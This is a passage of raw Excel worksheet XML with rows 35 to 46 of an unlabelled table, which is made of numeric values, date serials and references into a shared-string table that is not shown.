      </c>
      <c r="AU35">
        <v>6</v>
      </c>
      <c r="AV35">
        <v>1</v>
      </c>
      <c r="AW35">
        <v>4</v>
      </c>
      <c r="AX35">
        <v>0</v>
      </c>
      <c r="AY35">
        <v>1</v>
      </c>
      <c r="AZ35">
        <v>0</v>
      </c>
      <c r="BA35" t="s">
        <v>17196</v>
      </c>
      <c r="BB35" t="s">
        <v>14719</v>
      </c>
      <c r="BC35">
        <v>0</v>
      </c>
      <c r="BD35" t="s">
        <v>10328</v>
      </c>
    </row>
    <row r="36" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A36">
        <v>364</v>
      </c>
      <c r="B36" t="s">
        <v>372</v>
      </c>
      <c r="C36" t="s">
        <v>157</v>
      </c>
      <c r="D36" t="s">
        <v>373</v>
      </c>
      <c r="E36" t="s">
        <v>374</v>
      </c>
      <c r="F36" t="s">
        <v>375</v>
      </c>
      <c r="G36" s="1">
        <v>44214</v>
      </c>
      <c r="H36">
        <v>927</v>
      </c>
      <c r="I36">
        <v>927</v>
      </c>
      <c r="J36">
        <v>2</v>
      </c>
      <c r="K36">
        <v>1</v>
      </c>
      <c r="L36">
        <v>2</v>
      </c>
      <c r="M36">
        <v>0</v>
      </c>
      <c r="N36">
        <v>0</v>
      </c>
      <c r="O36">
        <v>0</v>
      </c>
      <c r="P36">
        <v>0</v>
      </c>
      <c r="Q36">
        <v>7</v>
      </c>
      <c r="R36">
        <v>6</v>
      </c>
      <c r="S36">
        <v>0</v>
      </c>
      <c r="T36">
        <v>0</v>
      </c>
      <c r="U36">
        <v>400000</v>
      </c>
      <c r="V36">
        <v>25000</v>
      </c>
      <c r="W36">
        <v>10000</v>
      </c>
      <c r="X36">
        <v>0</v>
      </c>
      <c r="Y36">
        <v>0</v>
      </c>
      <c r="Z36">
        <v>0</v>
      </c>
      <c r="AA36">
        <v>0</v>
      </c>
      <c r="AB36">
        <v>200</v>
      </c>
      <c r="AC36">
        <v>1500</v>
      </c>
      <c r="AD36">
        <v>0</v>
      </c>
      <c r="AE36">
        <v>0</v>
      </c>
      <c r="AF36" t="s">
        <v>376</v>
      </c>
      <c r="AG36">
        <v>68472</v>
      </c>
      <c r="AH36">
        <v>16</v>
      </c>
      <c r="AJ36">
        <v>237</v>
      </c>
      <c r="AK36" t="s">
        <v>377</v>
      </c>
      <c r="AL36" t="s">
        <v>378</v>
      </c>
      <c r="AM36" t="s">
        <v>379</v>
      </c>
      <c r="AN36" t="s">
        <v>55</v>
      </c>
      <c r="AO36">
        <v>1992</v>
      </c>
      <c r="AP36" t="s">
        <v>380</v>
      </c>
      <c r="AQ36" t="s">
        <v>381</v>
      </c>
      <c r="AR36" t="s">
        <v>382</v>
      </c>
      <c r="AS36" t="s">
        <v>71</v>
      </c>
      <c r="AT36" t="s">
        <v>58</v>
      </c>
      <c r="AU36">
        <v>20</v>
      </c>
      <c r="AV36">
        <v>1</v>
      </c>
      <c r="AW36">
        <v>10</v>
      </c>
      <c r="AX36">
        <v>20</v>
      </c>
      <c r="AY36">
        <v>6</v>
      </c>
      <c r="AZ36">
        <v>4</v>
      </c>
      <c r="BA36" t="s">
        <v>16672</v>
      </c>
      <c r="BB36" t="s">
        <v>14514</v>
      </c>
      <c r="BC36" t="s">
        <v>9984</v>
      </c>
      <c r="BD36">
        <v>0</v>
      </c>
    </row>
    <row r="37" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A37">
        <v>388</v>
      </c>
      <c r="B37" t="s">
        <v>383</v>
      </c>
      <c r="C37" t="s">
        <v>157</v>
      </c>
      <c r="D37" t="s">
        <v>384</v>
      </c>
      <c r="E37" t="s">
        <v>49</v>
      </c>
      <c r="F37" t="s">
        <v>385</v>
      </c>
      <c r="G37" s="1">
        <v>43928</v>
      </c>
      <c r="H37">
        <v>962</v>
      </c>
      <c r="I37">
        <v>962</v>
      </c>
      <c r="J37">
        <v>0</v>
      </c>
      <c r="K37">
        <v>1</v>
      </c>
      <c r="L37">
        <v>0</v>
      </c>
      <c r="M37">
        <v>0</v>
      </c>
      <c r="N37">
        <v>0</v>
      </c>
      <c r="O37">
        <v>0</v>
      </c>
      <c r="P37">
        <v>3</v>
      </c>
      <c r="Q37">
        <v>0</v>
      </c>
      <c r="R37">
        <v>0</v>
      </c>
      <c r="S37">
        <v>0</v>
      </c>
      <c r="T37">
        <v>1</v>
      </c>
      <c r="U37">
        <v>0</v>
      </c>
      <c r="V37">
        <v>0</v>
      </c>
      <c r="W37">
        <v>0</v>
      </c>
      <c r="X37">
        <v>0</v>
      </c>
      <c r="Y37">
        <v>0</v>
      </c>
      <c r="Z37">
        <v>0</v>
      </c>
      <c r="AA37">
        <v>0</v>
      </c>
      <c r="AB37">
        <v>0</v>
      </c>
      <c r="AC37">
        <v>0</v>
      </c>
      <c r="AD37">
        <v>0</v>
      </c>
      <c r="AE37">
        <v>0</v>
      </c>
      <c r="AF37" t="s">
        <v>386</v>
      </c>
      <c r="AG37">
        <v>61121</v>
      </c>
      <c r="AH37">
        <v>16</v>
      </c>
      <c r="AJ37">
        <v>252</v>
      </c>
      <c r="AK37" t="s">
        <v>387</v>
      </c>
      <c r="AL37" t="s">
        <v>388</v>
      </c>
      <c r="AM37" t="s">
        <v>389</v>
      </c>
      <c r="AN37" t="s">
        <v>55</v>
      </c>
      <c r="AO37">
        <v>2012</v>
      </c>
      <c r="AP37" t="s">
        <v>390</v>
      </c>
      <c r="AQ37" t="s">
        <v>391</v>
      </c>
      <c r="AR37" t="s">
        <v>386</v>
      </c>
      <c r="AU37">
        <v>25</v>
      </c>
      <c r="AV37">
        <v>1</v>
      </c>
      <c r="AW37">
        <v>9</v>
      </c>
      <c r="AX37">
        <v>78</v>
      </c>
      <c r="AY37">
        <v>1</v>
      </c>
      <c r="AZ37">
        <v>2</v>
      </c>
      <c r="BA37" t="s">
        <v>16681</v>
      </c>
      <c r="BB37" t="s">
        <v>14535</v>
      </c>
      <c r="BC37">
        <v>0</v>
      </c>
      <c r="BD37" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="38" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A38">
        <v>300</v>
      </c>
      <c r="B38" t="s">
        <v>392</v>
      </c>
      <c r="C38" t="s">
        <v>99</v>
      </c>
      <c r="D38" t="s">
        <v>393</v>
      </c>
      <c r="E38" t="s">
        <v>142</v>
      </c>
      <c r="F38" t="s">
        <v>394</v>
      </c>
      <c r="G38" s="1">
        <v>43871</v>
      </c>
      <c r="H38">
        <v>976</v>
      </c>
      <c r="I38">
        <v>976</v>
      </c>
      <c r="J38">
        <v>1</v>
      </c>
      <c r="K38">
        <v>0</v>
      </c>
      <c r="L38">
        <v>0</v>
      </c>
      <c r="M38">
        <v>0</v>
      </c>
      <c r="N38">
        <v>0</v>
      </c>
      <c r="O38">
        <v>0</v>
      </c>
      <c r="P38">
        <v>0</v>
      </c>
      <c r="Q38">
        <v>0</v>
      </c>
      <c r="R38">
        <v>0</v>
      </c>
      <c r="S38">
        <v>1</v>
      </c>
      <c r="T38">
        <v>0</v>
      </c>
      <c r="U38">
        <v>200000</v>
      </c>
      <c r="V38">
        <v>0</v>
      </c>
      <c r="W38">
        <v>0</v>
      </c>
      <c r="X38">
        <v>0</v>
      </c>
      <c r="Y38">
        <v>0</v>
      </c>
      <c r="Z38">
        <v>0</v>
      </c>
      <c r="AA38">
        <v>0</v>
      </c>
      <c r="AB38">
        <v>0</v>
      </c>
      <c r="AC38">
        <v>0</v>
      </c>
      <c r="AD38">
        <v>1</v>
      </c>
      <c r="AE38">
        <v>0</v>
      </c>
      <c r="AF38" t="s">
        <v>395</v>
      </c>
      <c r="AG38">
        <v>14470</v>
      </c>
      <c r="AH38">
        <v>12</v>
      </c>
      <c r="AJ38">
        <v>160</v>
      </c>
      <c r="AK38" t="s">
        <v>396</v>
      </c>
      <c r="AL38" t="s">
        <v>397</v>
      </c>
      <c r="AM38" t="s">
        <v>398</v>
      </c>
      <c r="AN38" t="s">
        <v>288</v>
      </c>
      <c r="AO38">
        <v>2013</v>
      </c>
      <c r="AP38">
        <v>81283232239</v>
      </c>
      <c r="AQ38" t="s">
        <v>399</v>
      </c>
      <c r="AR38" t="s">
        <v>400</v>
      </c>
      <c r="AS38" t="s">
        <v>179</v>
      </c>
      <c r="AT38" t="s">
        <v>58</v>
      </c>
      <c r="AU38">
        <v>25</v>
      </c>
      <c r="AV38">
        <v>0</v>
      </c>
      <c r="AW38">
        <v>0</v>
      </c>
      <c r="AX38">
        <v>0</v>
      </c>
      <c r="AY38">
        <v>2</v>
      </c>
      <c r="AZ38">
        <v>1</v>
      </c>
      <c r="BA38" t="s">
        <v>16661</v>
      </c>
      <c r="BB38" t="s">
        <v>14466</v>
      </c>
      <c r="BC38" t="s">
        <v>9550</v>
      </c>
      <c r="BD38">
        <v>0</v>
      </c>
    </row>
    <row r="39" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A39">
        <v>358</v>
      </c>
      <c r="B39" t="s">
        <v>401</v>
      </c>
      <c r="C39" t="s">
        <v>99</v>
      </c>
      <c r="D39" t="s">
        <v>402</v>
      </c>
      <c r="E39" t="s">
        <v>142</v>
      </c>
      <c r="F39" t="s">
        <v>403</v>
      </c>
      <c r="G39" s="1">
        <v>43917</v>
      </c>
      <c r="H39">
        <v>1059</v>
      </c>
      <c r="I39">
        <v>1059</v>
      </c>
      <c r="J39">
        <v>1</v>
      </c>
      <c r="K39">
        <v>0</v>
      </c>
      <c r="L39">
        <v>0</v>
      </c>
      <c r="M39">
        <v>0</v>
      </c>
      <c r="N39">
        <v>0</v>
      </c>
      <c r="O39">
        <v>0</v>
      </c>
      <c r="P39">
        <v>0</v>
      </c>
      <c r="Q39">
        <v>0</v>
      </c>
      <c r="R39">
        <v>0</v>
      </c>
      <c r="S39">
        <v>0</v>
      </c>
      <c r="T39">
        <v>0</v>
      </c>
      <c r="U39">
        <v>500000</v>
      </c>
      <c r="V39">
        <v>0</v>
      </c>
      <c r="W39">
        <v>0</v>
      </c>
      <c r="X39">
        <v>0</v>
      </c>
      <c r="Y39">
        <v>0</v>
      </c>
      <c r="Z39">
        <v>0</v>
      </c>
      <c r="AA39">
        <v>0</v>
      </c>
      <c r="AB39">
        <v>0</v>
      </c>
      <c r="AC39">
        <v>0</v>
      </c>
      <c r="AD39">
        <v>0</v>
      </c>
      <c r="AE39">
        <v>0</v>
      </c>
      <c r="AF39" t="s">
        <v>404</v>
      </c>
      <c r="AG39">
        <v>11710</v>
      </c>
      <c r="AH39">
        <v>12</v>
      </c>
      <c r="AJ39">
        <v>159</v>
      </c>
      <c r="AK39" t="s">
        <v>405</v>
      </c>
      <c r="AL39" t="s">
        <v>406</v>
      </c>
      <c r="AM39" t="s">
        <v>407</v>
      </c>
      <c r="AN39" t="s">
        <v>55</v>
      </c>
      <c r="AO39">
        <v>2008</v>
      </c>
      <c r="AP39" t="s">
        <v>408</v>
      </c>
      <c r="AQ39" t="s">
        <v>409</v>
      </c>
      <c r="AR39" t="s">
        <v>404</v>
      </c>
      <c r="AS39" t="s">
        <v>179</v>
      </c>
      <c r="AT39" t="s">
        <v>58</v>
      </c>
      <c r="AU39">
        <v>0</v>
      </c>
      <c r="AV39">
        <v>0</v>
      </c>
      <c r="AW39">
        <v>0</v>
      </c>
      <c r="AX39">
        <v>0</v>
      </c>
      <c r="AY39">
        <v>5</v>
      </c>
      <c r="AZ39">
        <v>0</v>
      </c>
      <c r="BA39" t="s">
        <v>17301</v>
      </c>
      <c r="BB39" t="s">
        <v>14508</v>
      </c>
      <c r="BC39" t="s">
        <v>10029</v>
      </c>
      <c r="BD39">
        <v>0</v>
      </c>
    </row>
    <row r="40" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A40">
        <v>389</v>
      </c>
      <c r="B40" t="s">
        <v>410</v>
      </c>
      <c r="C40" t="s">
        <v>157</v>
      </c>
      <c r="D40" t="s">
        <v>411</v>
      </c>
      <c r="E40" t="s">
        <v>412</v>
      </c>
      <c r="F40" t="s">
        <v>413</v>
      </c>
      <c r="G40" s="1">
        <v>44004</v>
      </c>
      <c r="H40">
        <v>1097</v>
      </c>
      <c r="I40">
        <v>1097</v>
      </c>
      <c r="J40">
        <v>3</v>
      </c>
      <c r="K40">
        <v>0</v>
      </c>
      <c r="L40">
        <v>5</v>
      </c>
      <c r="M40">
        <v>0</v>
      </c>
      <c r="N40">
        <v>0</v>
      </c>
      <c r="O40">
        <v>0</v>
      </c>
      <c r="P40">
        <v>0</v>
      </c>
      <c r="Q40">
        <v>10</v>
      </c>
      <c r="R40">
        <v>10</v>
      </c>
      <c r="S40">
        <v>0</v>
      </c>
      <c r="T40">
        <v>0</v>
      </c>
      <c r="U40">
        <v>200000</v>
      </c>
      <c r="V40">
        <v>0</v>
      </c>
      <c r="W40">
        <v>8000</v>
      </c>
      <c r="X40">
        <v>0</v>
      </c>
      <c r="Y40">
        <v>0</v>
      </c>
      <c r="Z40">
        <v>0</v>
      </c>
      <c r="AA40">
        <v>0</v>
      </c>
      <c r="AB40">
        <v>1500</v>
      </c>
      <c r="AC40">
        <v>1500</v>
      </c>
      <c r="AD40">
        <v>0</v>
      </c>
      <c r="AE40">
        <v>0</v>
      </c>
      <c r="AF40" t="s">
        <v>414</v>
      </c>
      <c r="AG40">
        <v>62264</v>
      </c>
      <c r="AH40">
        <v>16</v>
      </c>
      <c r="AJ40">
        <v>251</v>
      </c>
      <c r="AK40" t="s">
        <v>415</v>
      </c>
      <c r="AL40" t="s">
        <v>416</v>
      </c>
      <c r="AM40" t="s">
        <v>417</v>
      </c>
      <c r="AN40" t="s">
        <v>55</v>
      </c>
      <c r="AO40">
        <v>2005</v>
      </c>
      <c r="AP40" t="s">
        <v>418</v>
      </c>
      <c r="AQ40" t="s">
        <v>419</v>
      </c>
      <c r="AR40" t="s">
        <v>420</v>
      </c>
      <c r="AS40" t="s">
        <v>71</v>
      </c>
      <c r="AT40" t="s">
        <v>58</v>
      </c>
      <c r="AU40">
        <v>31</v>
      </c>
      <c r="AV40">
        <v>1</v>
      </c>
      <c r="AW40">
        <v>34</v>
      </c>
      <c r="AX40">
        <v>96</v>
      </c>
      <c r="AY40">
        <v>7</v>
      </c>
      <c r="AZ40">
        <v>7</v>
      </c>
      <c r="BA40" t="s">
        <v>17202</v>
      </c>
      <c r="BB40" t="s">
        <v>14536</v>
      </c>
      <c r="BC40">
        <v>0</v>
      </c>
      <c r="BD40" t="s">
        <v>10065</v>
      </c>
    </row>
    <row r="41" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A41">
        <v>233</v>
      </c>
      <c r="B41" t="s">
        <v>421</v>
      </c>
      <c r="C41" t="s">
        <v>157</v>
      </c>
      <c r="D41" t="s">
        <v>422</v>
      </c>
      <c r="E41" t="s">
        <v>142</v>
      </c>
      <c r="F41" t="s">
        <v>423</v>
      </c>
      <c r="G41" s="1">
        <v>43938</v>
      </c>
      <c r="H41">
        <v>1134</v>
      </c>
      <c r="I41">
        <v>1134</v>
      </c>
      <c r="J41">
        <v>2</v>
      </c>
      <c r="K41">
        <v>1</v>
      </c>
      <c r="L41">
        <v>4</v>
      </c>
      <c r="M41">
        <v>6</v>
      </c>
      <c r="N41">
        <v>0</v>
      </c>
      <c r="O41">
        <v>0</v>
      </c>
      <c r="P41">
        <v>0</v>
      </c>
      <c r="Q41">
        <v>12</v>
      </c>
      <c r="R41">
        <v>18</v>
      </c>
      <c r="S41">
        <v>0</v>
      </c>
      <c r="T41">
        <v>2</v>
      </c>
      <c r="U41">
        <v>1200000</v>
      </c>
      <c r="V41">
        <v>30000</v>
      </c>
      <c r="W41">
        <v>14000</v>
      </c>
      <c r="X41">
        <v>6000</v>
      </c>
      <c r="Y41">
        <v>0</v>
      </c>
      <c r="Z41">
        <v>0</v>
      </c>
      <c r="AA41">
        <v>0</v>
      </c>
      <c r="AB41">
        <v>1926</v>
      </c>
      <c r="AC41">
        <v>5700</v>
      </c>
      <c r="AD41">
        <v>0</v>
      </c>
      <c r="AE41">
        <v>60000</v>
      </c>
      <c r="AF41" t="s">
        <v>424</v>
      </c>
      <c r="AG41">
        <v>67218</v>
      </c>
      <c r="AH41">
        <v>16</v>
      </c>
      <c r="AJ41">
        <v>260</v>
      </c>
      <c r="AK41" t="s">
        <v>425</v>
      </c>
      <c r="AL41" t="s">
        <v>425</v>
      </c>
      <c r="AM41" t="s">
        <v>426</v>
      </c>
      <c r="AN41" t="s">
        <v>55</v>
      </c>
      <c r="AO41">
        <v>2000</v>
      </c>
      <c r="AP41" t="s">
        <v>427</v>
      </c>
      <c r="AQ41" t="s">
        <v>428</v>
      </c>
      <c r="AR41" t="s">
        <v>429</v>
      </c>
      <c r="AS41" t="s">
        <v>71</v>
      </c>
      <c r="AT41" t="s">
        <v>58</v>
      </c>
      <c r="AU41">
        <v>6</v>
      </c>
      <c r="AV41">
        <v>1</v>
      </c>
      <c r="AW41">
        <v>72</v>
      </c>
      <c r="AX41">
        <v>66</v>
      </c>
      <c r="AY41">
        <v>18</v>
      </c>
      <c r="AZ41">
        <v>12</v>
      </c>
      <c r="BA41" t="s">
        <v>17325</v>
      </c>
      <c r="BB41" t="s">
        <v>14407</v>
      </c>
      <c r="BC41">
        <v>0</v>
      </c>
      <c r="BD41" t="s">
        <v>10087</v>
      </c>
    </row>
    <row r="42" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A42">
        <v>760</v>
      </c>
      <c r="B42" t="s">
        <v>430</v>
      </c>
      <c r="C42" t="s">
        <v>47</v>
      </c>
      <c r="D42" t="s">
        <v>431</v>
      </c>
      <c r="E42" t="s">
        <v>142</v>
      </c>
      <c r="F42" t="s">
        <v>432</v>
      </c>
      <c r="G42" s="1">
        <v>43944</v>
      </c>
      <c r="H42">
        <v>1219</v>
      </c>
      <c r="I42">
        <v>1219</v>
      </c>
      <c r="J42">
        <v>0</v>
      </c>
      <c r="K42">
        <v>3</v>
      </c>
      <c r="L42">
        <v>0</v>
      </c>
      <c r="M42">
        <v>1</v>
      </c>
      <c r="N42">
        <v>0</v>
      </c>
      <c r="O42">
        <v>0</v>
      </c>
      <c r="P42">
        <v>0</v>
      </c>
      <c r="Q42">
        <v>2</v>
      </c>
      <c r="R42">
        <v>2</v>
      </c>
      <c r="S42">
        <v>0</v>
      </c>
      <c r="T42">
        <v>1</v>
      </c>
      <c r="U42">
        <v>0</v>
      </c>
      <c r="V42">
        <v>80000</v>
      </c>
      <c r="W42">
        <v>0</v>
      </c>
      <c r="X42">
        <v>400</v>
      </c>
      <c r="Y42">
        <v>0</v>
      </c>
      <c r="Z42">
        <v>0</v>
      </c>
      <c r="AA42">
        <v>0</v>
      </c>
      <c r="AB42">
        <v>800</v>
      </c>
      <c r="AC42">
        <v>1000</v>
      </c>
      <c r="AD42">
        <v>0</v>
      </c>
      <c r="AE42">
        <v>10000</v>
      </c>
      <c r="AF42" t="s">
        <v>433</v>
      </c>
      <c r="AG42">
        <v>20858</v>
      </c>
      <c r="AH42">
        <v>2</v>
      </c>
      <c r="AJ42">
        <v>36</v>
      </c>
      <c r="AK42" t="s">
        <v>434</v>
      </c>
      <c r="AL42" t="s">
        <v>435</v>
      </c>
      <c r="AM42" t="s">
        <v>436</v>
      </c>
      <c r="AN42" t="s">
        <v>55</v>
      </c>
      <c r="AO42">
        <v>2012</v>
      </c>
      <c r="AP42">
        <v>617870149</v>
      </c>
      <c r="AQ42" t="s">
        <v>437</v>
      </c>
      <c r="AR42" t="s">
        <v>438</v>
      </c>
      <c r="AS42" t="s">
        <v>71</v>
      </c>
      <c r="AT42" t="s">
        <v>58</v>
      </c>
      <c r="AU42">
        <v>25</v>
      </c>
      <c r="AV42">
        <v>0</v>
      </c>
      <c r="AW42">
        <v>3</v>
      </c>
      <c r="AX42">
        <v>13</v>
      </c>
      <c r="AY42">
        <v>5</v>
      </c>
      <c r="AZ42">
        <v>10</v>
      </c>
      <c r="BA42" t="s">
        <v>16752</v>
      </c>
      <c r="BB42" t="s">
        <v>14832</v>
      </c>
      <c r="BC42">
        <v>0</v>
      </c>
      <c r="BD42" t="s">
        <v>10191</v>
      </c>
    </row>
    <row r="43" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A43">
        <v>655</v>
      </c>
      <c r="B43" t="s">
        <v>439</v>
      </c>
      <c r="C43" t="s">
        <v>47</v>
      </c>
      <c r="D43" t="s">
        <v>440</v>
      </c>
      <c r="E43" t="s">
        <v>142</v>
      </c>
      <c r="F43" t="s">
        <v>441</v>
      </c>
      <c r="G43" s="1">
        <v>43885</v>
      </c>
      <c r="H43">
        <v>1243</v>
      </c>
      <c r="I43">
        <v>1243</v>
      </c>
      <c r="J43">
        <v>1</v>
      </c>
      <c r="K43">
        <v>0</v>
      </c>
      <c r="L43">
        <v>0</v>
      </c>
      <c r="M43">
        <v>10</v>
      </c>
      <c r="N43">
        <v>0</v>
      </c>
      <c r="O43">
        <v>0</v>
      </c>
      <c r="P43">
        <v>0</v>
      </c>
      <c r="Q43">
        <v>0</v>
      </c>
      <c r="R43">
        <v>0</v>
      </c>
      <c r="S43">
        <v>0</v>
      </c>
      <c r="T43">
        <v>0</v>
      </c>
      <c r="U43">
        <v>500000</v>
      </c>
      <c r="V43">
        <v>0</v>
      </c>
      <c r="W43">
        <v>0</v>
      </c>
      <c r="X43">
        <v>15000</v>
      </c>
      <c r="Y43">
        <v>0</v>
      </c>
      <c r="Z43">
        <v>0</v>
      </c>
      <c r="AA43">
        <v>0</v>
      </c>
      <c r="AB43">
        <v>0</v>
      </c>
      <c r="AC43">
        <v>0</v>
      </c>
      <c r="AD43">
        <v>0</v>
      </c>
      <c r="AE43">
        <v>0</v>
      </c>
      <c r="AF43" t="s">
        <v>442</v>
      </c>
      <c r="AG43">
        <v>21312</v>
      </c>
      <c r="AH43">
        <v>2</v>
      </c>
      <c r="AJ43">
        <v>50</v>
      </c>
      <c r="AK43" t="s">
        <v>443</v>
      </c>
      <c r="AL43" t="s">
        <v>444</v>
      </c>
      <c r="AM43" t="s">
        <v>445</v>
      </c>
      <c r="AN43" t="s">
        <v>55</v>
      </c>
      <c r="AO43">
        <v>2014</v>
      </c>
      <c r="AP43" t="s">
        <v>446</v>
      </c>
      <c r="AQ43" t="s">
        <v>447</v>
      </c>
      <c r="AR43" t="s">
        <v>448</v>
      </c>
      <c r="AS43" t="s">
        <v>71</v>
      </c>
      <c r="AT43" t="s">
        <v>58</v>
      </c>
      <c r="AU43">
        <v>350</v>
      </c>
      <c r="AV43">
        <v>0</v>
      </c>
      <c r="AW43">
        <v>10</v>
      </c>
      <c r="AX43">
        <v>44</v>
      </c>
      <c r="AY43">
        <v>12</v>
      </c>
      <c r="AZ43">
        <v>9</v>
      </c>
      <c r="BA43" t="s">
        <v>16730</v>
      </c>
      <c r="BB43" t="s">
        <v>14753</v>
      </c>
      <c r="BC43">
        <v>0</v>
      </c>
      <c r="BD43" t="s">
        <v>9555</v>
      </c>
    </row>
    <row r="44" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A44">
        <v>806</v>
      </c>
      <c r="B44" t="s">
        <v>449</v>
      </c>
      <c r="C44" t="s">
        <v>224</v>
      </c>
      <c r="D44" t="s">
        <v>450</v>
      </c>
      <c r="E44" t="s">
        <v>49</v>
      </c>
      <c r="F44" t="s">
        <v>451</v>
      </c>
      <c r="G44" s="1">
        <v>44218</v>
      </c>
      <c r="H44">
        <v>1253</v>
      </c>
      <c r="I44">
        <v>1253</v>
      </c>
      <c r="J44">
        <v>0</v>
      </c>
      <c r="K44">
        <v>0</v>
      </c>
      <c r="L44">
        <v>0</v>
      </c>
      <c r="M44">
        <v>0</v>
      </c>
      <c r="N44">
        <v>0</v>
      </c>
      <c r="O44">
        <v>0</v>
      </c>
      <c r="P44">
        <v>0</v>
      </c>
      <c r="Q44">
        <v>1</v>
      </c>
      <c r="R44">
        <v>0</v>
      </c>
      <c r="S44">
        <v>0</v>
      </c>
      <c r="T44">
        <v>1</v>
      </c>
      <c r="U44">
        <v>0</v>
      </c>
      <c r="V44">
        <v>0</v>
      </c>
      <c r="W44">
        <v>0</v>
      </c>
      <c r="X44">
        <v>0</v>
      </c>
      <c r="Y44">
        <v>0</v>
      </c>
      <c r="Z44">
        <v>0</v>
      </c>
      <c r="AA44">
        <v>0</v>
      </c>
      <c r="AB44">
        <v>100</v>
      </c>
      <c r="AC44">
        <v>0</v>
      </c>
      <c r="AD44">
        <v>0</v>
      </c>
      <c r="AE44">
        <v>500</v>
      </c>
      <c r="AF44" t="s">
        <v>452</v>
      </c>
      <c r="AG44">
        <v>55661</v>
      </c>
      <c r="AH44">
        <v>15</v>
      </c>
      <c r="AJ44">
        <v>223</v>
      </c>
      <c r="AK44" t="s">
        <v>453</v>
      </c>
      <c r="AL44" t="s">
        <v>454</v>
      </c>
      <c r="AM44" t="s">
        <v>455</v>
      </c>
      <c r="AN44" t="s">
        <v>68</v>
      </c>
      <c r="AO44">
        <v>2005</v>
      </c>
      <c r="AP44">
        <v>81392823756</v>
      </c>
      <c r="AQ44" t="s">
        <v>452</v>
      </c>
      <c r="AR44" t="s">
        <v>456</v>
      </c>
      <c r="AS44" t="s">
        <v>71</v>
      </c>
      <c r="AT44" t="s">
        <v>72</v>
      </c>
      <c r="AU44">
        <v>24</v>
      </c>
      <c r="AV44">
        <v>0</v>
      </c>
      <c r="AW44">
        <v>0</v>
      </c>
      <c r="AX44">
        <v>0</v>
      </c>
      <c r="AY44">
        <v>2</v>
      </c>
      <c r="AZ44">
        <v>8</v>
      </c>
      <c r="BA44" t="s">
        <v>17222</v>
      </c>
      <c r="BB44" t="s">
        <v>15882</v>
      </c>
      <c r="BC44" t="s">
        <v>10124</v>
      </c>
      <c r="BD44" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="45" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A45">
        <v>408</v>
      </c>
      <c r="B45" t="s">
        <v>457</v>
      </c>
      <c r="C45" t="s">
        <v>458</v>
      </c>
      <c r="D45" t="s">
        <v>459</v>
      </c>
      <c r="E45" t="s">
        <v>363</v>
      </c>
      <c r="F45" t="s">
        <v>460</v>
      </c>
      <c r="G45" s="1">
        <v>44112</v>
      </c>
      <c r="H45">
        <v>1254</v>
      </c>
      <c r="I45">
        <v>1254</v>
      </c>
      <c r="J45">
        <v>2</v>
      </c>
      <c r="K45">
        <v>0</v>
      </c>
      <c r="L45">
        <v>0</v>
      </c>
      <c r="M45">
        <v>0</v>
      </c>
      <c r="N45">
        <v>0</v>
      </c>
      <c r="O45">
        <v>0</v>
      </c>
      <c r="P45">
        <v>0</v>
      </c>
      <c r="Q45">
        <v>1</v>
      </c>
      <c r="R45">
        <v>1</v>
      </c>
      <c r="S45">
        <v>1</v>
      </c>
      <c r="T45">
        <v>1</v>
      </c>
      <c r="U45">
        <v>50000</v>
      </c>
      <c r="V45">
        <v>0</v>
      </c>
      <c r="W45">
        <v>0</v>
      </c>
      <c r="X45">
        <v>0</v>
      </c>
      <c r="Y45">
        <v>0</v>
      </c>
      <c r="Z45">
        <v>0</v>
      </c>
      <c r="AA45">
        <v>0</v>
      </c>
      <c r="AB45">
        <v>500</v>
      </c>
      <c r="AC45">
        <v>600</v>
      </c>
      <c r="AD45">
        <v>1</v>
      </c>
      <c r="AE45">
        <v>2000</v>
      </c>
      <c r="AF45" t="s">
        <v>461</v>
      </c>
      <c r="AG45">
        <v>29453</v>
      </c>
      <c r="AH45">
        <v>5</v>
      </c>
      <c r="AJ45">
        <v>153</v>
      </c>
      <c r="AK45" t="s">
        <v>462</v>
      </c>
      <c r="AL45" t="s">
        <v>463</v>
      </c>
      <c r="AM45" t="s">
        <v>464</v>
      </c>
      <c r="AN45" t="s">
        <v>55</v>
      </c>
      <c r="AO45">
        <v>2005</v>
      </c>
      <c r="AP45" t="s">
        <v>465</v>
      </c>
      <c r="AQ45" t="s">
        <v>466</v>
      </c>
      <c r="AR45" t="s">
        <v>461</v>
      </c>
      <c r="AS45" t="s">
        <v>71</v>
      </c>
      <c r="AT45" t="s">
        <v>58</v>
      </c>
      <c r="AU45">
        <v>21</v>
      </c>
      <c r="AV45">
        <v>1</v>
      </c>
      <c r="AW45">
        <v>0</v>
      </c>
      <c r="AX45">
        <v>0</v>
      </c>
      <c r="AY45">
        <v>8</v>
      </c>
      <c r="AZ45">
        <v>20</v>
      </c>
      <c r="BA45" t="s">
        <v>16685</v>
      </c>
      <c r="BB45" t="s">
        <v>14551</v>
      </c>
      <c r="BC45">
        <v>0</v>
      </c>
      <c r="BD45" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="46" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A46">
        <v>796</v>
      </c>
      <c r="B46" t="s">
        <v>467</v>
      </c>
      <c r="C46" t="s">
        <v>47</v>
      </c>
      <c r="D46" t="s">
        <v>468</v>
      </c>
      <c r="E46" t="s">
        <v>142</v>
      </c>
      <c r="F46" t="s">
        <v>469</v>
      </c>
      <c r="G46" s="1">
        <v>43861</v>
      </c>
      <c r="H46">
        <v>1328</v>
      </c>
      <c r="I46">
        <v>1328</v>
      </c>
      <c r="J46">
        <v>2</v>
      </c>
      <c r="K46">
        <v>1</v>
      </c>
      <c r="L46">
        <v>0</v>
      </c>
      <c r="M46">
        <v>2</v>
      </c>
      <c r="N46">
        <v>0</v>
      </c>
      <c r="O46">
        <v>0</v>
      </c>
      <c r="P46">
        <v>10</v>
      </c>
      <c r="Q46">
        <v>0</v>
      </c>
      <c r="R46">
        <v>0</v>
      </c>
      <c r="S46">
        <v>6</v>
      </c>
      <c r="T46">
        <v>2</v>
      </c>
      <c r="U46">
        <v>500000</v>
      </c>
      <c r="V46">
        <v>100000</v>
      </c>
      <c r="W46">
